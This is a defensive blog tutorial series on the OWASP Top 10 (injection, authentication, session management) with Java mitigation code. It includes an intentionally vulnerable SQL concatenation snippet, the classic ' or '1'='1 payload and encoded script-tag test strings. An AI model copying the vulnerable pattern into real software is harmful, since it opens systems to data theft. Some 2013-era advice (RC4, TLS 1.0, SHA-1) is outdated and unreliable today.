OWASP Top 10 – Introduction
http://blog.ippon.fr/2013/10/10/owasp-top-10-introduction/
When starting a new web application, the security risks are sadly often underestimated by everyone (developers, architects, IT, managers…).
Web applications are more vulnerable to attacks compared to standalone applications as they usually expose a service over a network to a potentially large population of users. Of course, the risk is higher when the population is not clearly identified (web site on internet) but it exists also with a closed list of known persons (enterprise application on intranet) because we always have data exchanged between the client (browser, web service client) and the server.
When you choose to ignore these risks, your data can be deleted, corrupted or stolen. And maybe worse, your customers can become victims of attacks because of your service. Their session can be hijacked by an attacker that will be granted all permissions on their personal data.
What about your reputation then? Remember the « PSNgate (http://en.wikipedia.org/wiki/PlayStation_Network_outage) » two years ago…
(Image: OWASP logo, http://blog.ippon.fr/wp-content/uploads/2013/10/800px-Owasp_logo.jpg)
OWASP (https://www.owasp.org/) provides an ordered list of the most important risks according to their risk rating methodology and prevalence statistics provided by different organizations. While the methodology gives a theoretical rating based on a few criteria like detectability, ease of exploit and technical impact, the prevalence statistics can change the order with concrete data from the real world.
E.g. in the last release this year, the CSRF risk was moved down from rank 5 to rank 8. According to OWASP, « this is because CSRF has been in the OWASP Top 10 for 6 years, and organizations and framework developers have focused on it enough to significantly reduce the number of CSRF vulnerabilities in real world applications. » [ref: OWASP Top 10 2013 - Release Notes (https://www.owasp.org/index.php/Top_10_2013-Release_Notes)].
Here are the most important risks identified by OWASP.
• A1 Injection (http://blog.ippon.fr/2013/10/11/owasp-top-10-a1/)
• A2 Broken Authentication and Session Management (http://blog.ippon.fr/2013/10/21/owasp-top-10-a2/)
• A3 Cross-Site Scripting (XSS) (http://blog.ippon.fr/2013/10/28/owasp-top-10-a3/)
• A4 Insecure Direct Object References (http://blog.ippon.fr/2013/11/04/owasp-top-10-a4/)
• A5 Security Misconfiguration (http://blog.ippon.fr/2013/11/14/owasp-top-10-a5/)
• A6 Sensitive Data Exposure (http://blog.ippon.fr/2013/11/18/owasp-top-10-a6/)
• A7 Missing Function Level Access Control (http://blog.ippon.fr/2013/12/09/owasp-top-10-a7/)
• A8 Cross-Site Request Forgery (CSRF) (http://blog.ippon.fr/2014/01/14/owasp-top-10-a8/)
• A9 Using Components with Known Vulnerabilities (http://blog.ippon.fr/2014/01/28/owasp-top-10-a9/)
• A10 Unvalidated Redirects and Forwards (http://blog.ippon.fr/2014/01/29/owasp-top-10-a10/)
Although OWASP gives very interesting advice to prevent these risks, these are only generalities. If you want to protect your application against these risks, you will need to find by yourself the appropriate mitigations depending on your environment (OS, programming language, application server, database…).
In my next 10 articles (1 article per risk), I will share with you some concrete mitigations (frameworks, best practices, code snippets…) I have put in place to reduce these risks in a Java-based web application.
OWASP Top 10 – A1 Injection
Description
The attacker sends untrusted data that will be injected in the targeted application to change its behaviour. The goal of this attack is usually to steal data but it can also be used to delete or corrupt your data or result in denial of service.
Example
I’m connected on my bank website and I want to view information on one of my accounts. A link in the page contains the iban parameter.
The SQL query is built by injecting the IBAN value in a query template.
String iban = request.getParameter("iban");
// VULNERABLE: the untrusted parameter becomes part of the SQL text itself
String sqlQuery = "select * from ACCOUNTS a where a.IBAN='" + iban + "'";
Statement statement = connection.createStatement();
ResultSet resultSet = statement.executeQuery(sqlQuery);
An attacker could call the URL in the link with any value he wants in the iban parameter. Let’s assume he enters ' or '1'='1 .
The SQL query select * from ACCOUNTS a where a.IBAN='' or '1'='1' will be executed and will return all accounts stored in the database!
Notes
Remember injection attacks are possible everywhere you have an interpreter. E.g. HTML, Javascript, CSS, HTTP headers, XML parsers, SQL, NoSQL, Xpath, LDAP…
In the « A3 – Cross-Site Scripting » article, we will see an example of Javascript injection to hijack a session.
OS injection is also possible using Runtime.getRuntime().exec(…) methods. Although the threat is real, web applications rarely execute OS external applications on the server.
Mitigations
(Image source: http://xkcd.com)
White-list input validation
The first protection is to know exactly what you expect as input from your users, so you can verify the entered data is valid. The recommended way is a white-list input validation on server side. That means you verify all the characters entered by the user are explicitly allowed. Moreover, the length and the format must be verified when applicable.
E.g. The IBAN format is known thus it can be verified before using it in an SQL query.
To validate your input, you can use the standard JSR-303 Bean Validation API (http://docs.oracle.com/javaee/6/api/javax/validation/package-summary.html) if your preferred presentation framework supports it (e.g. JSF 2, Spring MVC 3, GWT 2.5). You can also use the validation API provided by your presentation framework (e.g. JSF’s Validator API (http://docs.oracle.com/javaee/6/api/javax/faces/validator/package-summary.html)) or third-parties like ESAPI (https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API).
The Bean Validation API can also be used with your preferred persistence framework to validate (again) your data before persisting it in your database.
Canonicalization (C14N)
Sometimes, entered data can have different acceptable formats. E.g. a phone number can be entered with only digits or with spaces, dashes, dots between groups of digits and prefix between parentheses. A path can be absolute, relative or a symbolic link. A character in an HTML page can be encoded.
Canonicalization consists in transforming entered data to its simplest fixed format. For a phone number, it consists in removing all formatting characters to keep only digits. A canonicalized path is the absolute path. Once canonicalized, HTML data doesn’t contain encoded characters.
While canonicalization is optional, it is recommended when special characters (like &, \, %…) are allowed in input data.
If you want to canonicalize your input data, it must be done before input validation otherwise an attacker could pass the validation step by encoding some characters with allowed characters.
E.g. If & and ; are allowed while < and > are not, an attacker can inject < and > simply by replacing these characters with their encoded values &lt; and &gt;. If you apply canonicalization after input validation, the input data will be considered as valid, canonicalized then displayed and interpreted by the browser as an HTML tag.
ESAPI proposes, amongst other features, canonicalization for almost all interpreters (HTML, Javascript, URL, OS specific, databases…)
Encoder encoder = ESAPI.encoder();
String inputHTML = "&lt;script&gt;alert(\"hello\");&lt;/script&gt;";
String normalizedInputHTML = encoder.canonicalize(inputHTML);
System.out.println(normalizedInputHTML); // prints: <script>alert("hello");</script>
String inputURL = "%3Cscript%3Ealert(\"hello\");%3C/script%3E";
String normalizedInputURL = encoder.canonicalize(inputURL);
System.out.println(normalizedInputURL); // prints: <script>alert("hello");</script>
String potentialIntrusion = "%3Cscript&#x3E;alert%28%22hello&#34%29%3B%3C%2Fscript%3E";
// throws IntrusionException because mixed encoding was detected
String normalizedPotentialIntrusion = encoder.canonicalize(potentialIntrusion);
Tip: To protect your application against Unicode-based injection attacks, don’t forget to set the appropriate language locale and character set.
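As an added example (not code from the article or from ESAPI), here is the canonicalize-then-validate order described above, written with the JDK only. It decodes one layer of URL and HTML-entity encoding, refuses input that still decodes further (the mixed or nested encoding case the ESAPI snippet rejects with an IntrusionException), and only then applies a white-list. The class name, the white-list pattern, the entity subset and the sample inputs are constructed for this example.

```java
import java.io.UnsupportedEncodingException;
import java.net.URLDecoder;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Added example: canonicalize untrusted input BEFORE white-list validation,
// and reject input that is still encoded after one decoding pass.
public class CanonicalizeThenValidate {

    // White-list for a free-text comment field. '<' and '>' are deliberately
    // absent, while '&' and ';' are allowed: the situation described in the text.
    private static final Pattern COMMENT_WHITELIST =
            Pattern.compile("[A-Za-z0-9 .,!?'&;:/=()-]{0,200}");

    // Small subset of HTML entities, enough to show the mechanism
    private static final Pattern HTML_ENTITY =
            Pattern.compile("&(#x[0-9A-Fa-f]{1,6}|#[0-9]{1,7}|lt|gt|amp|quot|apos);");

    static String decodeHtmlEntities(String s) {
        Matcher m = HTML_ENTITY.matcher(s);
        StringBuffer out = new StringBuffer();
        while (m.find()) {
            String e = m.group(1);
            String rep;
            if (e.startsWith("#x")) {
                rep = new String(Character.toChars(Integer.parseInt(e.substring(2), 16)));
            } else if (e.startsWith("#")) {
                rep = new String(Character.toChars(Integer.parseInt(e.substring(1))));
            } else if (e.equals("lt")) { rep = "<";
            } else if (e.equals("gt")) { rep = ">";
            } else if (e.equals("amp")) { rep = "&";
            } else if (e.equals("quot")) { rep = "\"";
            } else { rep = "'"; }
            m.appendReplacement(out, Matcher.quoteReplacement(rep));
        }
        m.appendTail(out);
        return out.toString();
    }

    static String percentDecode(String s) {
        try {
            return URLDecoder.decode(s, "UTF-8"); // note: also turns '+' into a space
        } catch (IllegalArgumentException | UnsupportedEncodingException ex) {
            return s; // malformed %xx sequence: leave it, the white-list will reject it
        }
    }

    // Canonical form, or an exception when the input uses mixed or nested encodings
    static String canonicalize(String untrusted) {
        String afterUrl = percentDecode(untrusted);
        String afterHtml = decodeHtmlEntities(afterUrl);
        int codecsThatChangedIt = (afterUrl.equals(untrusted) ? 0 : 1)
                                + (afterHtml.equals(afterUrl) ? 0 : 1);
        if (codecsThatChangedIt > 1) {
            throw new IllegalArgumentException("mixed encoding detected");
        }
        String secondPass = decodeHtmlEntities(percentDecode(afterHtml));
        if (!secondPass.equals(afterHtml)) {
            throw new IllegalArgumentException("multiple encoding detected");
        }
        return afterHtml;
    }

    // Right order: canonicalize, then white-list the canonical value
    static String validateComment(String untrusted) {
        String canonical = canonicalize(untrusted);
        if (!COMMENT_WHITELIST.matcher(canonical).matches()) {
            throw new IllegalArgumentException("character outside the white-list");
        }
        return canonical;
    }

    // Wrong order, kept only to show why it fails: the raw string is checked
    static String validateThenCanonicalize(String untrusted) {
        if (!COMMENT_WHITELIST.matcher(untrusted).matches()) {
            throw new IllegalArgumentException("character outside the white-list");
        }
        return canonicalize(untrusted);
    }

    private static void attempt(String label, String input, boolean rightOrder) {
        try {
            String v = rightOrder ? validateComment(input) : validateThenCanonicalize(input);
            System.out.println(label + ": accepted -> " + v);
        } catch (IllegalArgumentException e) {
            System.out.println(label + ": rejected (" + e.getMessage() + ")");
        }
    }

    public static void main(String[] args) {
        // Constructed sample inputs
        String entityEncoded = "&lt;script&gt;alert(1)&lt;/script&gt;";
        attempt("validate then canonicalize", entityEncoded, false);
        attempt("canonicalize then validate", entityEncoded, true);
        attempt("mixed encoding", "%26lt;script%26gt;", true);
        attempt("nested encoding", "&amp;lt;script&amp;gt;", true);
        attempt("plain text", "Happy New Year!", true);
    }
}
```

The first call shows the problem from the text: every character of the entity-encoded string is on the white-list, so the wrong order accepts it and the decoded tag reaches the page; the right order rejects it because the canonical value contains '<'. The two following inputs are rejected before validation even starts.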
Prepared statement (SQL)
A prepared statement is a precompiled SQL statement. Beyond the performance advantage, prepared statements are highly recommended to prevent SQL injection attacks. Instead of creating an SQL statement by injecting an untrusted string in a template, you create a static string in which you declare bind variables.
String iban = request.getParameter("iban");
// iban should be canonicalized then validated before continuing
String sqlQuery = "select * from ACCOUNTS a where a.IBAN=?";
PreparedStatement stmt = connection.prepareStatement(sqlQuery);
stmt.setString(1, iban); // bind variable: the value is never part of the SQL text
ResultSet resultSet = stmt.executeQuery();
In this case, if the attacker replaces the IBAN value with ' or '1'='1 , the executed query will be equivalent to select * from ACCOUNTS a where a.IBAN=''' or ''1''=''1' . Obviously, this query will return no result.
Of course, if you have applied the mitigations in the previous sections, you should have rejected this invalid IBAN before you try to execute the query as it does not match the IBAN pattern.
An acceptable alternative to the prepared statement is a stored procedure. The most important thing to understand is to use bind variables instead of string concatenation to create your query.
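An added example, not the article's code, that chains the three mitigations on the article's bank lookup: canonicalize the IBAN, white-list validate it (shape plus the ISO 7064 mod-97 check digits), then query through a bind variable. The ACCOUNTS table and IBAN column come from the article; the OWNER column, the JDBC Connection supplied by the caller and the sample IBANs are assumptions made for the example.

```java
import java.math.BigInteger;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.regex.Pattern;

// Added example: canonicalize -> white-list validate -> bind variable,
// applied to the bank account lookup used throughout the article.
public class AccountLookup {

    // ISO 13616 shape: country code, two check digits, 11 to 30 alphanumerics
    private static final Pattern IBAN_SHAPE = Pattern.compile("[A-Z]{2}[0-9]{2}[A-Z0-9]{11,30}");

    // Canonical form: no separators, upper case. Formatting differences are not attacks.
    static String canonicalizeIban(String raw) {
        return raw.replaceAll("[ \\-]", "").toUpperCase();
    }

    // White-list validation: shape first, then the mod-97 check digits
    static boolean isValidIban(String canonical) {
        if (!IBAN_SHAPE.matcher(canonical).matches()) {
            return false;
        }
        // Move the first four characters to the end, map letters A..Z to 10..35
        String rearranged = canonical.substring(4) + canonical.substring(0, 4);
        StringBuilder digits = new StringBuilder();
        for (char c : rearranged.toCharArray()) {
            digits.append(Character.digit(c, 36));
        }
        return new BigInteger(digits.toString()).mod(BigInteger.valueOf(97)).intValue() == 1;
    }

    // Only validated input reaches the database, and only through a bind variable.
    // The OWNER column is assumed for the example; the Connection comes from the caller.
    static String findOwner(Connection connection, String untrustedIban) throws SQLException {
        String iban = canonicalizeIban(untrustedIban);
        if (!isValidIban(iban)) {
            throw new IllegalArgumentException("rejected: not an IBAN");
        }
        String sql = "select a.OWNER from ACCOUNTS a where a.IBAN = ?";
        try (PreparedStatement stmt = connection.prepareStatement(sql)) {
            stmt.setString(1, iban);
            try (ResultSet rs = stmt.executeQuery()) {
                return rs.next() ? rs.getString(1) : null;
            }
        }
    }

    public static void main(String[] args) {
        // Constructed samples: a well-formed IBAN, the same one typed with spaces
        // and lower case, and the injection string from the article
        String[] inputs = {
            "GB82WEST12345698765432",
            "gb82 west 1234 5698 7654 32",
            "' or '1'='1"
        };
        for (String in : inputs) {
            String canonical = canonicalizeIban(in);
            System.out.println("'" + in + "' -> '" + canonical + "' valid=" + isValidIban(canonical));
        }
    }
}
```

The first two inputs canonicalize to the same valid value, so a user who types spaces is not rejected; the injection string fails the shape check and never reaches findOwner's query. Even if validation were bypassed, the bind variable would still keep the value out of the SQL text.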
Tip: With JPA (http://docs.oracle.com/javaee/6/api/javax/persistence/package-summary.html), you can create queries (or named queries) with bind variables to declare your SQL statements. Behind the scene, your preferred JPA implementation (Hibernate, OpenJPA…) will create a prepared statement for you.
With simple queries, you create the query directly in your DAO class:
public class AccountDaoImpl {

    private EntityManager em; // injected, e.g. with @PersistenceContext

    public List<Account> findAll() {
        TypedQuery<Account> query = em.createQuery("SELECT a FROM Account a", Account.class);
        return query.getResultList();
    }

    public Account findByIban(String iban) {
        TypedQuery<Account> query = em.createQuery("SELECT a FROM Account a WHERE a.iban = :iban", Account.class);
        // we assume the iban is already canonicalized and validated
        query.setParameter("iban", iban);
        return query.getSingleResult();
    }
}
With named queries, you declare your queries on your entity class:
@Entity
@NamedQueries({
    @NamedQuery(name="Account.findAll", query="SELECT a FROM Account a"),
    @NamedQuery(name="Account.findByIban", query="SELECT a FROM Account a WHERE a.iban = :iban")
})
public class Account {
    // entity fields and accessors omitted
}
Then you use them in your DAO class:
public class AccountDaoImpl {

    private EntityManager em; // injected, e.g. with @PersistenceContext

    public List<Account> findAll() {
        TypedQuery<Account> query = em.createNamedQuery("Account.findAll", Account.class);
        return query.getResultList();
    }

    public Account findByIban(String iban) {
        TypedQuery<Account> query = em.createNamedQuery("Account.findByIban", Account.class);
        // we assume the iban is already canonicalized and validated
        query.setParameter("iban", iban);
        return query.getSingleResult();
    }
}
Personally, I recommend named queries when possible. With queries created at runtime, you can still be vulnerable to SQL injection if you use string concatenation. With named queries, the query is prepared at initialization time. At runtime, you can only pass your parameters and execute the query.
Description
The attacker steals his victim’s credentials or any information that will help him impersonate the victim on your application.
Examples
Client attack
To authenticate on my bank website, my password is very simple to remember, it’s my birthdate. But I want to change it with my wife’s birthdate and I receive the following email from my bank:
Dear Philippe,
Your identifier is : philippe
Your new password is : 01021975
Regards,
Your Bank.
Any attacker could easily guess your password. If he knows your bank website requires an 8-digit password, with social engineering, it is easy to have all your family members’ birthdates (parents, spouse, children…).
And even if your password was not easy to guess, an experienced attacker could also intercept your email and get your identifier and your password.
Server attack
An experienced attacker has downloaded the login and password of all customers of your bank. Luckily for him, all data is in clear text, so the attacker can use the stolen credentials before the administrator can alert the customers…
Mitigations
Educate the users of your application
This attack can be very easy to use (even without any knowledge in computer sciences) because all users are not aware of the risks. I have already seen DBAs hiding the database credentials on a post-it under their keyboard!
Users should:
• keep their credentials safe
• not use easy to guess passwords (0000, 123abc, password or even P@ssw0rd)
• not use personal information (names, phone numbers, birth date) in their passwords
• not use the same password on different applications. If one of these applications is attacked, all your other accounts are potentially compromised.
• be careful when using a public wifi network. An attacker can easily intercept all communication (encrypted or not).
OWASP Top 10 – A2 Broken Authentication and Session Management
And of course, be careful with “social engineering”. Social engineering consists in manipulating a victim to obtain confidential or personal information. It is usually a good method for example to get the personal phone number or address of a VIP (a CEO, a HR director…). But it can also be used to get your mother’s maiden name which is often a question proposed by most of the web sites to recover your lost password.
(Image: http://blog.ippon.fr/wp-content/uploads/2013/10/security_question.png, source: http://xkcd.com)
Identity and Access Management (IAM)
You can implement your own IAM framework from scratch or use an existing solution like Fortress (http://iamfortress.org/).
Anyway, you should apply the following rules with more or less restrictions depending on how sensitive the information you need to protect is.
Password strength
The password must be strong and difficult to guess.
Usually, a strong password should have at least 8 characters. There are 4 sets of characters: digits, uppercase letters, lowercase letters and special characters. The characters of the password should be from at least 3 of the 4 sets of characters.
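An added example (not from the article) implementing the rule just stated: minimum length and at least 3 of the 4 character sets, plus the easy-to-guess examples given in the user guidance as a small deny-list and a check that the user name is not embedded in the password. The class, the deny-list contents and the sample passwords are constructed for the example.

```java
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

// Added example: the password strength rule (8+ characters, 3 of 4 sets)
// plus a deny-list built from the "easy to guess" examples in the text.
public class PasswordPolicy {

    private static final int MIN_LENGTH = 8;
    private static final int MIN_SETS = 3;
    // Constructed deny-list; a real one is far larger (or a breached-password lookup)
    private static final Set<String> DENY_LIST = new HashSet<>(Arrays.asList(
            "0000", "123abc", "password", "p@ssw0rd"));

    // Number of distinct character sets (digits, upper, lower, special) present
    static int characterSets(char[] password) {
        boolean digit = false, upper = false, lower = false, special = false;
        for (char c : password) {
            if (Character.isDigit(c)) digit = true;
            else if (Character.isUpperCase(c)) upper = true;
            else if (Character.isLowerCase(c)) lower = true;
            else special = true;
        }
        return (digit ? 1 : 0) + (upper ? 1 : 0) + (lower ? 1 : 0) + (special ? 1 : 0);
    }

    // Returns null when the password is acceptable, otherwise the reason it is not
    static String rejectReason(char[] password, String userName) {
        if (password.length < MIN_LENGTH) {
            return "shorter than " + MIN_LENGTH + " characters";
        }
        if (characterSets(password) < MIN_SETS) {
            return "uses fewer than " + MIN_SETS + " of the 4 character sets";
        }
        String lowered = new String(password).toLowerCase();
        if (DENY_LIST.contains(lowered)) {
            return "is a well-known password";
        }
        if (userName != null && lowered.contains(userName.toLowerCase())) {
            return "contains the user name";
        }
        return null;
    }

    public static void main(String[] args) {
        // Constructed samples: the birthdate from the email above, a deny-listed
        // value that passes the character-set rule, a name-based one, a strong one
        String[] samples = {"01021975", "P@ssw0rd", "Philippe-2013", "Tr0ub4dor&3"};
        for (String s : samples) {
            String reason = rejectReason(s.toCharArray(), "philippe");
            System.out.println(s + " -> " + (reason == null ? "accepted" : "rejected: " + reason));
        }
    }
}
```

The order of the checks matters: P@ssw0rd satisfies length and all four sets, so only the deny-list catches it, which is why a character-set rule alone is not enough.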
Password generation and distribution
Multi-factor authentication
For users that have access to sensitive information and operations, you should require at least 2 credentials of different types. There are 3 types of credentials:
• « Something I Know » like a password,
• « Something I Own » like a USB token,
• « Something I am » like a fingerprint.
Password renewal
All credentials (password, certificate…) must expire regularly. The frequency will depend on what the owner of these credentials can do on your application.
When a password expires, the user must change it at login time.
Password recovery
If the user forgets his password, the application must generate a temporary password, valid for a couple of hours maximum. The temporary password is sent to the user by email, possibly PGP encrypted. Then the user must change it at login time.
Account locking
To prevent brute force attacks, the account must be locked after too many (3) failed login attempts.
Usually, it is also preferable to inactivate the account when it is not used for a long time (a couple of months).
Authentication credentials protection
(Image: http://blog.ippon.fr/wp-content/uploads/2013/10/security.png, source: http://xkcd.com)
The passwords stored in your database must be encrypted or hashed. If an attacker can download your table of users, it will be difficult for him (but not impossible) to retrieve the passwords in clear text.
Two different options: hash or encryption.
Hash (one-way encryption)
If you don’t need to retrieve the real password in clear text, then hash is preferable. It is like a one-way encryption. Once hashed, it is theoretically impossible to retrieve the original value. Of course, it is still possible to « guess » the password. If your bank had stored the password hash value, the attacker that has downloaded the list of credentials would have to apply the hash algorithm on a list of frequently used passwords and verify if the resulting hash value exists in the stolen list.
Note that several passwords could give the same hash value. If the attacker finds a matching hash value, he can use the password even if it is not the real one.
Several hash functions exist. The most used are MD5 and SHA-1. MD5 is known to have a high risk of collision (several messages give the same hash value) so it is not recommended. SHA-1 is acceptable on a simple website with no sensitive data to protect but SHA-2 is preferable when security really matters.
But remember a hash value is very fast to compute (less than 0.1ms on an old computer). Imagine how many passwords the attacker can try per second to find matching hash values in the stolen list with a recent computer or a set of “zombie” computers…
Password-based key derivation function
For a better protection, I recommend using a password-based key derivation function. The goal is simple: make it longer for the attacker to decrypt the passwords in the database.
The most used is PBKDF2 (simply Password-Based Key Derivation Function 2) a.k.a. PKCS#5.
The principle? You generate a salt (i.e. a random value) for each password. The function will apply a pseudorandom function on the password to protect along with the generated salt. Then it will apply again the same pseudorandom function on the same password along with, this time, the result obtained at the previous step. And so on…
Obviously, you store the resulting hash value and the initial salt in the database.
When the user enters his password, you apply the same PBKDF2 algorithm to the provided password, using the stored salt and the appropriate number of iterations and then you compare the resulting hash value with the expected value.
For a strong protection, you should apply at least 10 000 iterations. Don’t worry, if a simple hash takes less than 0.1ms, it will stay very fast to generate (a few milliseconds), but for the attacker, it will be a lot more difficult because he will have to find first the number of iterations (this must be a secret value), then apply this « slow » algorithm on each password of his dictionary.
SunJCE provides an implementation with HMAC-SHA1 as the pseudorandom function.
import java.security.SecureRandom;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;

char[] password = request.getParameter("password").toCharArray(); // clear-text password to protect
// Generating a 32-bytes salt
SecureRandom random = SecureRandom.getInstance("SHA1PRNG", "SUN");
byte[] salt = random.generateSeed(32);
// Apply PBKDF2 algorithm on the password, with the generated salt and 10000 iterations
SecretKeyFactory f = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1", "SunJCE");
SecretKey key = f.generateSecret(new PBEKeySpec(password, salt, 10000, 256));
byte[] hashedPassword = key.getEncoded();
Note: If you need yet stronger protection, check out bcrypt (http://www.openbsd.org/papers/bcrypt-paper.ps) or scrypt (http://www.tarsnap.com/scrypt/scrypt.pdf). Sun does not support these KDFs in their security providers but you can find open-source implementations for Java like jBCrypt (http://www.mindrot.org/projects/jBCrypt/) and wg/scrypt (https://github.com/wg/scrypt).
Encryption
In some rare cases, you may need to retrieve the password in clear text. For example, if you have a password recovery policy that requires to send the password to the user after he has provided some secret answers. Note that this policy is not recommended (refer to my recommended password recovery policy above).
You can choose symmetric or asymmetric encryption depending on your needs.
If your application encrypts the password before storage then decrypts it when needed, a symmetric algorithm is preferable. The secret key is stored in a keystore accessible only to your application.
If the password is encrypted by a third-party component before storage (e.g. an administration tool), it is preferable to use an asymmetric algorithm (public-private key pair) instead of sharing a secret key. The third-party component encrypts the password using your public key and sends it to you for storage. And you keep your private key safe in your keystore for decryption.
Session protection
Session ID
If your application is Servlet 3.0 compliant, you can configure it by adding the following in your web.xml:
<session-config>
    <tracking-mode>COOKIE</tracking-mode>
    <cookie-config>
        <secure>true</secure>
    </cookie-config>
</session-config>
Otherwise, you will need to configure your server. For example, if you use Apache Tomcat 6, you can remove the jsessionid from URLs by adding the attribute disableURLRewriting="true" in your context.xml:
<Context ... disableURLRewriting="true">
</Context>
And to protect the session cookie, just add secure="true" to the appropriate connector in server.xml:
<Connector port="..." protocol="..." secure="true"/>
Session fixation
Obviously, the session ID must be changed after each login or logout.
When anonymous, the session ID can be exposed because nothing sensitive is accessible. But once authenticated, if you keep the same session ID after a successful authentication, even if you protect it, it would be already known. An attacker could use this session ID and gain access to your personal account.
For the same reason, after logout, the previous session must be invalidated thus the session ID will be changed.
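An added example (not the article's code) doing the same session hardening through the Servlet 3.0 API rather than web.xml: cookie-only tracking, the Secure and HttpOnly cookie flags, a new session ID on login, invalidation on logout and an inactivity timeout. It needs a Servlet 3.0 container (Tomcat 7 or later, not the Tomcat 6 configured above); the listener and method names, the userId attribute and the 10-minute timeout are assumptions made for the example.

```java
import java.util.EnumSet;
import javax.servlet.ServletContext;
import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;
import javax.servlet.SessionCookieConfig;
import javax.servlet.SessionTrackingMode;
import javax.servlet.annotation.WebListener;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpSession;

// Added example: programmatic equivalent of the web.xml session settings,
// plus the session ID rotation that session fixation protection requires.
@WebListener
public class SessionHardening implements ServletContextListener {

    private static final int INACTIVITY_TIMEOUT_SECONDS = 10 * 60; // sensitive application: 10 minutes

    @Override
    public void contextInitialized(ServletContextEvent sce) {
        ServletContext ctx = sce.getServletContext();
        // The session ID travels only in a cookie, never rewritten into URLs
        ctx.setSessionTrackingModes(EnumSet.of(SessionTrackingMode.COOKIE));
        SessionCookieConfig cookie = ctx.getSessionCookieConfig();
        cookie.setSecure(true);   // sent over SSL/TLS only
        cookie.setHttpOnly(true); // not readable by scripts
    }

    @Override
    public void contextDestroyed(ServletContextEvent sce) {
    }

    // Call once the credentials have been checked: drop the pre-authentication
    // session (whose ID may already be known) and start a fresh one.
    static HttpSession startAuthenticatedSession(HttpServletRequest request, String userId) {
        HttpSession old = request.getSession(false);
        if (old != null) {
            old.invalidate();
        }
        HttpSession fresh = request.getSession(true); // new ID issued by the container
        fresh.setAttribute("userId", userId);
        fresh.setMaxInactiveInterval(INACTIVITY_TIMEOUT_SECONDS);
        return fresh;
    }

    // Logout: invalidate so the ID cannot be reused afterwards
    static void logout(HttpServletRequest request) {
        HttpSession session = request.getSession(false);
        if (session != null) {
            session.invalidate();
        }
    }
}
```

Attributes stored in the anonymous session (a shopping cart, a language choice) are lost when it is invalidated; copy the ones you want to keep into the fresh session before returning it.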
Session timeout
Each active session is a potential open door on your application for an attacker. If you keep the sessions alive forever, you give more time to the attackers to steal active session identifiers and impersonate more victims. That’s why user sessions must expire after a few minutes of inactivity. The acceptable timeout can be from less than 10 minutes for sensitive applications up to 30 minutes for a simple public application.
On Apache Tomcat 6, the default session timeout is defined in $TOMCAT_HOME/conf/web.xml at 30 minutes. If you want a different value for a particular deployed application, just define the desired value in its web.xml.
Encrypted transport
All the protections described in the previous sections are useless if an attacker can easily intercept the password provided by the user at login time. To prevent that, it is highly recommended to send the credentials over a secure SSL connection.
Be careful though. Vulnerabilities were found in SSL in the past and no doubt new weaknesses will be found in the future. The most important mitigation against SSL vulnerabilities is to have your SSL stack (usually JSSE or OpenSSL) up-to-date with the latest security patches.
You should also choose carefully the SSL versions you will support and the cipher suites you will accept during handshake.
SSL versions
I recommend at least TLS 1.0 (SSL 3.1) released in 1999. Older versions have known important vulnerabilities. TLS 1.1 (SSL 3.2 in 2006) and TLS 1.2 (SSL 3.3 in 2008) are preferable but some server environments and clients won’t support them (TLS 1.1+ is supported by JSSE starting from JRE 1.7) and some old browsers do not support these versions.
Cipher suites
A cipher suite is a combination of a key exchange algorithm, a cipher algorithm (with key size) and a message authentication code (MAC) algorithm that will be used to negotiate how the exchanges between the client and the server will be protected.
During handshake, the client sends the list of cipher suites he supports then the server chooses the one he prefers amongst its own acceptable cipher suites. Of course, if none of the cipher suites accepted by the server match the cipher suites proposed by the client, the handshake will fail and the server will refuse the connection.
But some cipher suites have vulnerabilities and it is easy for an attacker to propose only weak cipher suites.
Of course, you should never accept them. Usually, your SSL stack will propose a default list that does not have the weakest cipher suites but I don’t recommend to rely on that list. Exactly like the white-list input validation described in the previous article about Injection, it is highly recommended to give explicitly the list of acceptable cipher suites. No surprise if you want to change your SSL stack.
Known vulnerabilities
Three important vulnerabilities were discovered recently on TLS. They can be used to decrypt the session ID in the header.
In 2011, BEAST (http://vnhacker.blogspot.com/2011/09/beast.html) (Browser Exploit Against SSL and TLS) found by two security researchers, Juliano Rizzo and Thai Duong, exploits a CBC vulnerability. TLS 1.0 and older versions are impacted if you use block ciphers like AES or 3-DES.
• Long-term mitigation: support only TLS 1.1 and TLS 1.2 but most of the browsers do not support these versions and if they are supported, they are usually disabled by default.
• Short-term mitigation: with TLS 1.0 or older, only accept cipher suites with the RC4 cipher algorithm. Although a recent vulnerability has been found on RC4, it is still the best mitigation with TLS 1.0 or older. Be aware that most of the servers will select the first cipher suite they support in the ordered list provided by the client. So don’t accept any vulnerable cipher suites.
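As an added example (not from the article), here is an explicit allow-list of protocol versions and cipher suites applied to a JSSE server socket, following the white-list advice of the cipher suites section and the long-term BEAST mitigation above: the list is intersected with what the running JRE supports, the server's own order is enforced rather than the client's, and the socket is never left on defaults if nothing on the list is available. The class name and the particular suites are my choices (JSSE names for ECDHE/AES-GCM suites, TLS 1.2 only); adapt the list to the clients you must support.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLParameters;
import javax.net.ssl.SSLServerSocket;

// Added example: white-list of TLS versions and cipher suites for a JSSE server.
public class TlsAllowList {

    static final String[] ALLOWED_PROTOCOLS = {"TLSv1.2"};
    // Assumed starting list (JSSE suite names), not a standard
    static final String[] ALLOWED_SUITES = {
        "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256",
        "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
        "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384",
        "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"
    };

    // Keep the allowed entries that the stack supports, in the allow-list's order
    static String[] intersect(String[] allowed, String[] supported) {
        List<String> supportedList = Arrays.asList(supported);
        List<String> kept = new ArrayList<>();
        for (String a : allowed) {
            if (supportedList.contains(a)) {
                kept.add(a);
            }
        }
        return kept.toArray(new String[0]);
    }

    // Build hardened parameters; throws rather than silently falling back to defaults
    static SSLParameters hardenedParameters(String[] supportedProtocols, String[] supportedSuites) {
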